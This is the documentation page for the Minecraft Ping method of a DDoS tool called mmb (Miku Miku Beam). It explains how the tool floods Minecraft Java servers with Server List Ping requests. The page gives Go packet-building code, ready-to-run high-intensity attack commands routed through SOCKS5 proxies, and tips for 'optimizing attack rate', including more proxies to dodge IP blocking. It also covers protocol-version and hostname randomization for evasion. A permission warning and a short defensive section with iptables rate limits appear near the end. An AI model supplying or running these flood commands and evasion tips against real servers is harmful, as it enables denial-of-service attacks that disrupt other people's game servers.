> ## Documentation Index
> Fetch the complete documentation index at: https://mintlify.com/sammwyy/mikuMikuBeam/llms.txt
> Use this file to discover all available pages before exploring further.

# Minecraft Ping

> Specialized attack targeting Minecraft servers using server list ping protocol

## Overview

Minecraft Ping is a specialized Layer 7 attack designed specifically for Minecraft Java Edition servers. It exploits the Server List Ping protocol by flooding the server with status requests, forcing it to process packet parsing, JSON serialization, and response generation for each request.

<Note>
  This attack uses the legitimate Minecraft protocol and appears as normal server list pings.
</Note>

## How it works

The Minecraft Ping attack implements the official Minecraft Server List Ping protocol:

1. **TCP Connection**: Establishes connection to target server (default port 25565)
2. **Handshake Packet**: Sends protocol handshake with:
   * Packet ID: `0x00`
   * Protocol Version: `754` (Minecraft 1.16.4+)
   * Server Address: Target hostname
   * Server Port: Target port
   * Next State: `1` (status)
3. **Status Request**: Sends status request packet (`0x00`)
4. **Response Handling**: Reads partial response and discards it
5. **Connection Close**: Closes connection immediately
6. **Repeat**: Each thread continuously sends new ping requests

### Minecraft protocol structure

```
Handshake Packet:
┌─────────────────────────────────────────┐
│ Length (VarInt)                         │
├─────────────────────────────────────────┤
│ Packet ID: 0x00                         │
├─────────────────────────────────────────┤
│ Protocol Version: 754 (VarInt)          │
├─────────────────────────────────────────┤
│ Server Address Length (VarInt)          │
├─────────────────────────────────────────┤
│ Server Address (String)                 │
├─────────────────────────────────────────┤
│ Server Port (Unsigned Short)            │
├─────────────────────────────────────────┤
│ Next State: 0x01 (VarInt)              │
└─────────────────────────────────────────┘

Status Request:
┌─────────────────────────────────────────┐
│ Length: 0x01 (VarInt)                   │
├─────────────────────────────────────────┤
│ Packet ID: 0x00                         │
└─────────────────────────────────────────┘
```

## When to use

Minecraft Ping is effective for:

* **Minecraft server stress testing**: Test your server's capacity to handle status requests
* **Query flood simulation**: Simulate massive server list queries (like from server lists)
* **DDoS protection testing**: Verify if anti-DDoS plugins (like TCPShield) work correctly
* **Resource exhaustion**: Test server's JSON serialization and packet handling under load
* **Plugin stress testing**: Test if monitoring/status plugins can handle high request rates

<Warning>
  This attack can severely impact Minecraft server performance. Only use on servers you own or have permission to test.
</Warning>

## Usage

Basic Minecraft Ping attack (uses default port 25565):

```bash theme={null}
mmb attack minecraft_ping minecraft.example.com
```

Explicit port specification:

```bash theme={null}
mmb attack minecraft_ping tcp://minecraft.example.com:25565
```

High-intensity attack:

```bash theme={null}
mmb attack minecraft_ping minecraft.example.com \
  --duration 120 \
  --delay 200 \
  --threads 50 \
  --verbose
```

### Parameters

<ParamField path="target" type="string" required>
  Minecraft server hostname or IP. Can include `tcp://` prefix and `:port` suffix.
</ParamField>

<ParamField path="--duration" type="int" default="60">
  Attack duration in seconds
</ParamField>

<ParamField path="--delay" type="int" default="500">
  Delay between ping requests in milliseconds per thread
</ParamField>

<ParamField path="--packet-size" type="int" default="512">
  Not used in Minecraft Ping (kept for API consistency)
</ParamField>

<ParamField path="--threads" type="int" default="0">
  Number of concurrent threads (0 = number of CPU cores)
</ParamField>

<ParamField path="--verbose" type="boolean" default="false">
  Show detailed logs for each ping request
</ParamField>

<ParamField path="--no-proxy" type="boolean" default="false">
  Allow running without proxies (not recommended)
</ParamField>

## Expected behavior

### Console output

Standard mode:

```
Starting minecraft_ping against minecraft.example.com with 50 proxies
20:30:15 PPS:125 Total:125 Proxies:50
20:30:16 PPS:138 Total:263 Proxies:50
20:30:17 PPS:142 Total:405 Proxies:50
```

Verbose mode:

```
Starting minecraft_ping against minecraft.example.com with 50 proxies
Verbose mode enabled - showing detailed attack logs
20:30:15 PPS:125 Total:125 Proxies:50 [SOCKS5 proxy.example.net:1080 -> tcp://minecraft.example.com:25565]
20:30:16 PPS:138 Total:263 Proxies:50 [SOCKS5 proxy2.example.net:1080 -> tcp://minecraft.example.com:25565]
```

### Server-side impact

On the Minecraft server, each ping request causes:

1. **Packet parsing**: Deserialize VarInt-encoded handshake packet
2. **Protocol handling**: Validate protocol version and state transition
3. **Status generation**: Serialize server info to JSON:
   ```json theme={null}
   {
     "version": {"name": "1.20.4", "protocol": 765},
     "players": {"max": 100, "online": 15},
     "description": {"text": "Server MOTD"},
     "favicon": "data:image/png;base64,..."
   }
   ```
4. **Response transmission**: Send JSON response with VarInt length prefix
5. **Connection cleanup**: Close connection and free resources

## Technical implementation

Implementation details from `internal/attacks/game/minecraft_ping.go:19-73`:

* **Protocol version**: Uses `754` (compatible with Minecraft 1.16-1.20+)
* **VarInt encoding**: Custom `writeVarInt()` implementation
* **String encoding**: Length-prefixed UTF-8 strings via `writeString()`
* **Port handling**: Defaults to `25565` if target uses scheme-less format with port 80
* **Response reading**: Reads 256 bytes + copies 64 more to prevent buffer clog
* **Timeout**: 3-second deadline for entire operation
* **Proxy support**: Full SOCKS5/HTTP proxy support

### Packet construction

```go theme={null}
// Build handshake packet
var pkt bytes.Buffer
pkt.WriteByte(0x00)                                // packet id
writeVarInt(&pkt, 754)                             // protocol version
writeString(&pkt, host)                            // server address
binary.Write(&pkt, binary.BigEndian, uint16(port)) // server port
writeVarInt(&pkt, 0x01)                            // next state: status

// Frame with length prefix
var framed bytes.Buffer
writeVarInt(&framed, pkt.Len())
framed.Write(pkt.Bytes())

// Send handshake
conn.Write(framed.Bytes())

// Send status request (packet 0x00, length 1)
conn.Write([]byte{0x01, 0x00})
```

## Attack effectiveness

<AccordionGroup>
  <Accordion title="Why Minecraft servers are vulnerable">
    * **CPU-intensive**: JSON serialization for every ping
    * **Favicon encoding**: Base64 PNG encoding in response
    * **Plugin overhead**: Many plugins hook into status events
    * **No caching**: Most servers regenerate JSON for each request
    * **Query plugins**: Additional overhead from query/vote plugins
  </Accordion>

  <Accordion title="Server performance impact">
    At high request rates (500+ pings/sec):

    * CPU usage spikes (JSON serialization bottleneck)
    * Network thread saturation
    * Increased tick time (gameplay lag)
    * Potential crash if `max-tick-time` exceeded
    * Plugin event handlers slow down
  </Accordion>

  <Accordion title="Optimizing attack rate">
    * **Lower delay**: 100-200ms for aggressive attacks
    * **More threads**: 50-100 threads typical
    * **More proxies**: Harder to IP-block
    * **Longer duration**: Sustain pressure over time
  </Accordion>
</AccordionGroup>

## Defense mechanisms

If you're protecting a Minecraft server:

<Steps>
  <Step title="Use DDoS protection">
    Services like TCPShield, Cosmic Guard, or cloudflare Spectrum specifically protect Minecraft servers.
  </Step>

  <Step title="Rate limit status requests">
    Plugins like ProtocolLib can limit status requests per IP:

    ```java theme={null}
    // Example: Max 5 status requests per IP per second
    ```
  </Step>

  <Step title="Cache status responses">
    Implement response caching to avoid repeated JSON serialization.
  </Step>

  <Step title="Firewall rules">
    Use iptables or cloud firewall to limit connections:

    ```bash theme={null}
    iptables -A INPUT -p tcp --dport 25565 -m state --state NEW \
      -m recent --set
    iptables -A INPUT -p tcp --dport 25565 -m state --state NEW \
      -m recent --update --seconds 1 --hitcount 5 -j DROP
    ```
  </Step>

  <Step title="Monitor connection rates">
    Alert when new connection rate exceeds baseline.
  </Step>
</Steps>

## Real-world scenarios

### Testing server capacity

```bash theme={null}
# Baseline: Normal server list ping rate
mmb attack minecraft_ping mc.example.com \
  --threads 5 \
  --delay 1000 \
  --duration 60

# Medium load: Simulating multiple server lists
mmb attack minecraft_ping mc.example.com \
  --threads 20 \
  --delay 500 \
  --duration 120

# High load: Stress test
mmb attack minecraft_ping mc.example.com \
  --threads 100 \
  --delay 100 \
  --duration 300 \
  --verbose
```

### Validating DDoS protection

```bash theme={null}
# Test if TCPShield/Cosmic Guard blocks attack traffic
mmb attack minecraft_ping protected.mc-server.com \
  --threads 50 \
  --delay 200

# Monitor:
# - Do proxies get blocked?
# - Does legitimate traffic still work?
# - Are there false positives?
```

## Protocol compatibility

<Info>
  **Protocol Version 754**:

  * Compatible with Minecraft 1.16 through 1.20+
  * Works with Paper, Spigot, Purpur, Fabric, Forge servers
  * BungeeCord and Velocity proxies also vulnerable
  * Bedrock Edition servers not affected (different protocol)
</Info>

## Comparison with other attacks

<Tabs>
  <Tab title="vs TCP Flood">
    **Minecraft Ping**:

    * Protocol-specific, appears legitimate
    * Triggers server-side processing
    * Harder to distinguish from real traffic

    **TCP Flood**:

    * Generic TCP, random data
    * Minimal server processing
    * Easier to detect and block
  </Tab>

  <Tab title="vs HTTP Flood">
    **Minecraft Ping**:

    * Minecraft protocol only
    * Smaller packets, higher efficiency
    * Targets game server logic

    **HTTP Flood**:

    * HTTP protocol, web servers only
    * Larger packets, more bandwidth
    * Targets web application logic
  </Tab>
</Tabs>

## Advanced techniques

### Protocol version randomization

Modify the attack to randomize protocol versions to test version validation:

```go theme={null}
// Current: always uses 754
writeVarInt(&pkt, 754)

// Enhanced: random versions
versions := []int{754, 755, 756, 757, 758, 759}
writeVarInt(&pkt, versions[rand.Intn(len(versions))])
```

### Hostname spoofing

Test virtual host routing by varying the hostname sent:

```go theme={null}
// Instead of real hostname, send variations
hosts := []string{host, "localhost", "127.0.0.1", "example.com"}
writeString(&pkt, hosts[rand.Intn(len(hosts))])
```

## Related attack methods

<CardGroup cols={2}>
  <Card title="TCP Flood" icon="network-wired" href="/attacks/tcp-flood">
    Generic TCP flood for any service
  </Card>

  <Card title="HTTP Flood" icon="water" href="/attacks/http-flood">
    Layer 7 HTTP request flood
  </Card>
</CardGroup>
